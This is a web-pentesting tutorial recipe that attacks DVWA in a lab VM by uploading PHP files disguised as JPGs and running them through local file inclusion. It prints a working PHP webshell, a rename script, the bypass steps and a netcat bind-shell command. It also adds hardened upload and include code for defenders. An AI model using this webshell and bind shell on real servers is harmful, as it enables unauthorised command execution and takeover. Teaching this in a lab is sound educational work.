Abusing file inclusions and uploads

As we saw in Chapter 4, Finding Vulnerabilities, file inclusion vulnerabilities occur when developers use poorly validated input to generate file paths and then use those paths to include source code files. Modern versions of server-side languages, such as PHP since 5.2.0, disable the ability to include remote files by default, so it has been less common to find a remote file inclusion (RFI) since 2011.

In this recipe, we will first upload a couple of malicious files, one of which is a webshell (a web page capable of executing system commands on the server), and then execute them using local file inclusion.

Getting ready

We will use Damn Vulnerable Web Application (DVWA) in the vulnerable_vm for this recipe, with its security level set to medium, so let's set it up:

  1. Navigate to http://192.168.56.102/dvwa.
  2. Log in.
  3. Set the security level to medium: Go to DVWA Security, select medium in the combo box and click on Submit.

We will upload some files to the server, but we need to remember where they are stored in order to be able to call them again; so, go to Upload in DVWA and upload any JPG image. If it is successful, it will say that the file was uploaded to ../../hackable/uploads/. Now we know the relative path where uploaded files are saved; that's enough for this recipe.

We also need to have our files ready; so let's create a new text file with the following content:

<?php
// Run the command received in the "cmd" parameter and print its output.
system($_GET['cmd']);
// A minimal form pointing at the webshell's final location; it submits with GET
// so the text box and a hand-written cmd parameter take the same path.
echo '<form method="get" action="../../hackable/uploads/webshell.php"><input type="text" name="cmd"/></form>';
?>

Save it as webshell.php. We will need another file; create rename.php and put the following code in it:

<?php
// Give the uploaded webshell its .php extension back so the server will execute it.
system('mv ../../hackable/uploads/webshell.jpg ../../hackable/uploads/webshell.php');
?>

This file will take a specific image file (webshell.jpg) and rename it to webshell.php.

How to do it...

  1. First, let's try to upload our webshell; in DVWA go to Upload and try to upload webshell.php, as shown:

    So, there is a validation of what we can upload and what we can't. This means that we will need to upload an image file, or more precisely, a file with a .jpg, .gif, or .png extension. This is why we need the renamer script: it returns the .php extension to the original file so that it can then be executed.

  2. To avoid errors at validation, we need to rename our PHP files with a valid extension. In a terminal, we will go to the directory where PHP files are stored and create copies of them:
    cp rename.php rename.jpg
    cp webshell.php webshell.jpg
    
  3. Now, let's go back to DVWA and try to upload both of them again:
  4. Once both JPG files are uploaded, we will use the local file inclusion vulnerability to execute rename.jpg. Go to the File Inclusion section and exploit the vulnerability by including ../../hackable/uploads/rename.jpg.

    There is no output from the execution of this file, so we will need to assume that webshell.jpg is now named webshell.php.

  5. If it worked, we should now be able to include ../../hackable/uploads/webshell.php, so let's try it:
  6. In the text box seen in the top-left corner, write /sbin/ifconfig and hit Enter:

    And it worked! As seen in the image, the server has the IP address 192.168.56.102. Now we can execute commands on the server by typing them in the text box or by setting a different value for the cmd parameter.

How it works...

The first test that we did, uploading a valid JPG, was meant to discover the path where uploaded files are saved, so that we could use this path in rename.php and in the action field of the form.

It is necessary to use a rename script for two reasons: first, the upload page only allows image extensions, so our scripts need to have one of those; and second, we need to call our webshell with parameters (the commands to execute), and we cannot pass parameters when requesting a JPG image from a web server.
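The extension check that forces the rename step is the only control the upload page applies, and it tells us nothing about what the file contains. The following upload handler is an added example (not code from the book or from DVWA) of the checks a defender would want instead: it sniffs the real content type, requires a parseable image, assigns a server-chosen name so no user input reaches the path, stores the file outside the web root (the directory, size limit and form field name "uploaded" are assumptions), and serves files back through a handler with a fixed Content-Type.

```php
<?php
// Added example, not part of the book or DVWA. Paths and field names are assumptions.
declare(strict_types=1);

const UPLOAD_DIR = '/var/app/private_uploads'; // assumed: outside the document root
const MAX_BYTES  = 2 * 1024 * 1024;            // assumed limit

// Content types accepted after sniffing, mapped to the extension we assign.
const ALLOWED = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/**
 * Validate an uploaded image and store it under a name the server chooses.
 * Returns the stored filename or throws a RuntimeException.
 */
function store_uploaded_image(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed with error ' . $file['error']);
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not a file uploaded in this request');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }

    // Sniff the content; the client's $file['type'] and the original
    // filename/extension are attacker-controlled and are ignored entirely.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED[$mime])) {
        throw new RuntimeException("rejected content type: $mime");
    }
    // Matching magic bytes is not enough; require a parseable image.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a valid image');
    }

    // Random name with an extension chosen from the sniffed type.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640); // readable by the application, never executable
    return $name;
}

/**
 * Serve a stored image by name. Only names in the exact format generated
 * above are accepted, so "../" style input can never reach the filesystem.
 */
function serve_image(string $name): void
{
    if (!preg_match('/\A[0-9a-f]{32}\.(jpg|png|gif)\z/', $name)) {
        http_response_code(404);
        return;
    }
    $path = UPLOAD_DIR . '/' . $name;
    if (!is_file($path)) {
        http_response_code(404);
        return;
    }
    $mime = array_search(substr($name, -3), ALLOWED, true);
    header('Content-Type: ' . $mime);
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: inline; filename="' . $name . '"');
    readfile($path);
}

// Usage: handle a multipart POST with an assumed field named "uploaded".
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['uploaded'])) {
    try {
        echo 'Stored as ' . htmlspecialchars(store_uploaded_image($_FILES['uploaded']));
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'Upload rejected: ' . htmlspecialchars($e->getMessage());
    }
}
```

Two caveats worth keeping in mind. A file that passes every check here can still carry PHP code (for instance inside a JPEG comment segment), so these checks reduce exposure but do not by themselves stop the trick in this recipe; what stops it is that a stored file is never passed to include() and never lives where the web server would execute it. And the random name means an attacker who does upload something cannot predict the path to include later.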

The system() function of PHP is the core of the attack: it invokes a system command and displays its output. This allows us to rename the webshell file from .jpg to .php and to execute the commands we specify as GET parameters.
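The other half of the attack is the include itself: include() parses whatever file it is handed as PHP, regardless of extension, so an include whose path comes from the request will happily execute rename.jpg. The following is an added example (not code from the book or from DVWA) showing that vulnerable pattern beside an allowlisted replacement; the page keys, file names and pages/ directory are assumptions.

```php
<?php
// Added example, not part of the book or DVWA. Page names and paths are assumptions.
declare(strict_types=1);

// --- Vulnerable form (shown as a comment, do not use) -----------------------
// include($_GET['page']);
// With this pattern, ?page=../../hackable/uploads/rename.jpg makes PHP parse
// and execute rename.jpg as PHP; the .jpg extension is irrelevant to include().

// --- Hardened form: request values are keys into a fixed map, never paths ---
const PAGE_DIR = __DIR__ . '/pages';      // assumed location of page templates
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Resolve a page key to an absolute include path.
 * Returns null unless the key is exactly one of the allowlisted entries and
 * the resolved file still lies inside PAGE_DIR (defense in depth against a
 * future mistake such as a symlink or a bad entry in the map).
 */
function resolve_page(string $key): ?string
{
    if (!isset(PAGES[$key])) {
        return null;
    }
    $path = realpath(PAGE_DIR . '/' . PAGES[$key]);
    $prefix = PAGE_DIR . '/';
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Usage: unknown keys get a 404 instead of an include attempt.
$key  = (string) ($_GET['page'] ?? 'home');
$path = resolve_page($key);
if ($path === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $path;
```

Alongside the code change, the php.ini settings allow_url_include=Off (the default the chapter mentions) and an open_basedir restriction limit what a remaining inclusion bug can reach, and web server rules that refuse to execute scripts from the upload directory remove the payoff of the rename step even if the upload checks are bypassed.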

There's more...

Once we upload and execute server-side code, there are many options for compromising the server further; for example, the following command is what we call a bind shell:

nc -lp 12345 -e /bin/bash

It opens TCP port 12345 on the server and listens for a connection; when a client connects, it executes /bin/bash, taking the shell's input from the network and sending its output back to the connected host (the attacking machine).

It is also possible to make the server download a malicious program, for example a privilege escalation exploit, and execute it to become a user with more privileges.
